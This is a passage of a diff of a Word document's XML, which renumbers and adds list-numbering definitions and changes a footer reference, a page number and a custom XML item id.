         <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="24"/>
@@ -4654,7 +7159,7 @@
       </w:pPr>
     </w:p>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId13"/>
+      <w:footerReference w:type="default" r:id="rId26"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
       <w:pgBorders w:offsetFrom="page">
@@ -4750,7 +7255,7 @@
         <w:sz w:val="26"/>
         <w:szCs w:val="26"/>
       </w:rPr>
-      <w:t>1</w:t>
+      <w:t>7</w:t>
     </w:r>
     <w:r>
       <w:rPr>
@@ -5950,6 +8455,209 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="1F8E48C7"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="7F869FAE"/>
+    <w:lvl w:ilvl="0" w:tplc="04090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="26A54C72"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="72965E06"/>
+    <w:lvl w:ilvl="0" w:tplc="C3CCF2C0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+        <w:sz w:val="26"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2B330DEE"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="3AC61EC0"/>
@@ -6042,7 +8750,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2C236DA3"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="0A92E6F0"/>
@@ -6155,7 +8863,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="34764391"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="5BAC3884"/>
@@ -6270,7 +8978,98 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="393C5F29"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="2D28ABF6"/>
+    <w:lvl w:ilvl="0" w:tplc="E07218CC">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="default"/>
+        <w:color w:val="auto"/>
+        <w:sz w:val="24"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="49ED435A"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="A42A753A"/>
@@ -6391,7 +9190,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4D976B85"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="4B36E07E"/>
@@ -6481,7 +9280,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="572738AD"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="FEDE183C"/>
@@ -6594,7 +9393,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="639353BF"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="F768F282"/>
@@ -6707,7 +9506,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="670E5B7A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="2B18C0B6"/>
@@ -6820,7 +9619,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="67A629DB"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E390AC68"/>
@@ -6909,10 +9708,123 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="779D122D"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="3364EDB0"/>
+    <w:lvl w:ilvl="0" w:tplc="04090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7F1E0404"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="F5707C40"/>
+    <w:tmpl w:val="5B60E1D2"/>
     <w:lvl w:ilvl="0" w:tplc="04090001">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -7029,31 +9941,31 @@
     <w:abstractNumId w:val="8"/>
   </w:num>
   <w:num w:numId="3">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="17"/>
   </w:num>
   <w:num w:numId="4">
     <w:abstractNumId w:val="9"/>
   </w:num>
   <w:num w:numId="5">
-    <w:abstractNumId w:val="11"/>
+    <w:abstractNumId w:val="13"/>
   </w:num>
   <w:num w:numId="6">
-    <w:abstractNumId w:val="13"/>
+    <w:abstractNumId w:val="15"/>
   </w:num>
   <w:num w:numId="7">
-    <w:abstractNumId w:val="15"/>
+    <w:abstractNumId w:val="18"/>
   </w:num>
   <w:num w:numId="8">
     <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="9">
-    <w:abstractNumId w:val="19"/>
+    <w:abstractNumId w:val="22"/>
   </w:num>
   <w:num w:numId="10">
-    <w:abstractNumId w:val="17"/>
+    <w:abstractNumId w:val="20"/>
   </w:num>
   <w:num w:numId="11">
-    <w:abstractNumId w:val="18"/>
+    <w:abstractNumId w:val="21"/>
   </w:num>
   <w:num w:numId="12">
     <w:abstractNumId w:val="10"/>
@@ -7068,10 +9980,10 @@
     <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="16">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="14"/>
   </w:num>
   <w:num w:numId="17">
-    <w:abstractNumId w:val="16"/>
+    <w:abstractNumId w:val="19"/>
   </w:num>
   <w:num w:numId="18">
     <w:abstractNumId w:val="6"/>
@@ -7083,7 +9995,19 @@
     <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="21">
-    <w:abstractNumId w:val="20"/>
+    <w:abstractNumId w:val="24"/>
+  </w:num>
+  <w:num w:numId="22">
+    <w:abstractNumId w:val="11"/>
+  </w:num>
+  <w:num w:numId="23">
+    <w:abstractNumId w:val="23"/>
+  </w:num>
+  <w:num w:numId="24">
+    <w:abstractNumId w:val="12"/>
+  </w:num>
+  <w:num w:numId="25">
+    <w:abstractNumId w:val="16"/>
   </w:num>
   <w:numIdMacAtCleanup w:val="15"/>
 </w:numbering>
@@ -8399,7 +11323,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{89C052B3-DD42-4A6F-A2A1-D1992F977555}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{F8F1BC89-87E2-426F-912C-F09E4B779780}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
